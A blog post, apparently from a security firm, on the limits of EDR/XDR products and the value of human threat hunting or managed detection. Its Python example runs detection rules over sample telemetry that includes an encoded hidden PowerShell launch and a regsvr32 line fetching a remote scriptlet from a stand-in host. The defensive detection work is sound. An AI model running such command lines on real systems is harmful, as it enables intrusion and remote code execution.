An Empirical Assessment of Endpoint Detection and Response Systems against Advanced Persistent Threats Attack Vectors


Recently I wrote about EDR failing to detect and respond to Advanced Persistent Threat (APT) attack vectors, after coming across a research paper on the topic while looking into the use of Machine Learning in detection and response products such as Endpoint Detection and Response (EDR) and eXtended Detection and Response (XDR).

The sales pitch is that these solutions give your organisation a level of protection that you previously could only have by spending a substantial amount of money to employ your own Security Operations analysts to do the event correlation and threat hunting.

The truth is far more nuanced, and the pitch greatly overestimates the capability of any EDR or XDR solution to protect your organisation on its own. The range of capabilities and functionality in tools sold as "detection and response" is vast. The machine learning techniques within these products also differ widely and may be applied to different parts of the software: a machine learning model used for telemetry collection or event correlation adds nothing to the threat hunting process, and such distinctions are rarely made clear when evaluating EDR or XDR solutions.

Before deciding on an EDR or XDR solution, ask yourself whether you will be able to operate the product. These tools do add to your cyber resilience, but not always in the areas you would expect, and without human operators they offer very little over and above a next-generation anti-virus product.

Alternatively, look for a Managed Detection and Response (MDR) provider or a managed Security Operations Centre, where you pay another organisation to run the detection and response service for you. Many EDR/XDR solutions do collect the data that indicates a breach even when they raise no alert on it; in tests this outcome is often referred to as "telemetry detection". That data only helps if someone is there to hunt through it.
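To make the "telemetry detection" distinction concrete, here is an added example (not code from the original post or from the cited paper) that simulates it in Python: a constructed process-creation log in which the EDR has alerted on only one event, plus a few hypothetical hunt rules of the kind an analyst or MDR provider would run over the stored telemetry. The event data, the rule names and the rule logic are assumptions for illustration, not anything measured in the paper.

```python
"""Added example (not from the original post or the cited paper): simulating
the gap between an EDR raising an *alert* and an EDR merely *recording
telemetry* that a human hunt would have to query. All events and rules are
constructed for illustration."""
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    pid: int
    parent_image: str
    image: str
    command_line: str
    alerted: bool = False  # True if the simulated EDR raised an alert itself


# Constructed process-creation telemetry, as an EDR agent might record it.
# Only pid 104 carries an alert; every other event is telemetry only.
TELEMETRY = [
    ProcessEvent(100, "explorer.exe", "winword.exe", "winword.exe report.docx"),
    ProcessEvent(101, "winword.exe", "cmd.exe",
                 "cmd.exe /c powershell -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA"),
    ProcessEvent(102, "explorer.exe", "chrome.exe", "chrome.exe"),
    ProcessEvent(103, "cmd.exe", "regsvr32.exe",
                 "regsvr32.exe /s /n /u /i:http://example.invalid/a.sct scrobj.dll"),
    ProcessEvent(104, "explorer.exe", "mimikatz.exe", "mimikatz.exe", alerted=True),
    ProcessEvent(105, "services.exe", "svchost.exe", "svchost.exe -k netsvcs"),
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}


def rule_office_spawns_shell(ev: ProcessEvent) -> bool:
    """An Office application launching a command shell (macro / phishing chain)."""
    return ev.parent_image.lower() in OFFICE_APPS and ev.image.lower() in SHELLS


def rule_encoded_powershell(ev: ProcessEvent) -> bool:
    """PowerShell invoked with an encoded command. powershell.exe accepts any
    unambiguous prefix of -EncodedCommand (-e, -enc, ...), so match prefixes."""
    tokens = ev.command_line.lower().split()
    if "powershell" not in " ".join(tokens):
        return False
    return any(t.startswith("-e") and "-encodedcommand".startswith(t) for t in tokens)


def rule_regsvr32_remote_scriptlet(ev: ProcessEvent) -> bool:
    """regsvr32 pulling a scriptlet over HTTP(S) via /i: and scrobj.dll (LOLBin)."""
    if ev.image.lower() != "regsvr32.exe":
        return False
    tokens = ev.command_line.lower().split()
    return any(t.startswith("/i:http") for t in tokens) and "scrobj.dll" in tokens


# Hypothetical hunt rules; the names are assumptions for this example.
HUNT_RULES = {
    "office_spawns_shell": rule_office_spawns_shell,
    "encoded_powershell": rule_encoded_powershell,
    "regsvr32_remote_scriptlet": rule_regsvr32_remote_scriptlet,
}


def classify(ev: ProcessEvent, rules=HUNT_RULES) -> str:
    """'alert' if the EDR fired on its own, 'telemetry' if the evidence exists
    but only a hunt rule finds it, 'none' otherwise."""
    if ev.alerted:
        return "alert"
    if any(rule(ev) for rule in rules.values()):
        return "telemetry"
    return "none"


def hunt(events, rules=HUNT_RULES) -> dict:
    """What an analyst or MDR gets by querying stored telemetry: {rule: [pids]}.
    Events the EDR already alerted on are skipped; they are in the console."""
    hits: dict = {}
    for ev in events:
        if ev.alerted:
            continue
        for name, rule in rules.items():
            if rule(ev):
                hits.setdefault(name, []).append(ev.pid)
    return hits


def outcome_counts(events, rules=HUNT_RULES) -> dict:
    """Tally events per outcome class, as an EDR test report might."""
    counts = {"alert": 0, "telemetry": 0, "none": 0}
    for ev in events:
        counts[classify(ev, rules)] += 1
    return counts


if __name__ == "__main__":
    print("outcomes:", outcome_counts(TELEMETRY))
    for name, pids in hunt(TELEMETRY).items():
        print(f"hunt rule {name!r} surfaced pids {pids} with no alert raised")
```

Running it shows that the agent already held the evidence for events 101 and 103 (an Office process spawning an encoded PowerShell, and a regsvr32 scriptlet download), but nothing in the console pointed at them until a hunt rule was run over the telemetry. That is the value a human operator or an MDR provider adds on top of the product itself.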

https://www.mdpi.com/2624-800X/1/3/21/htm

As always, please feel free to reach out to us if you require assistance with EDR or XDR solutions.
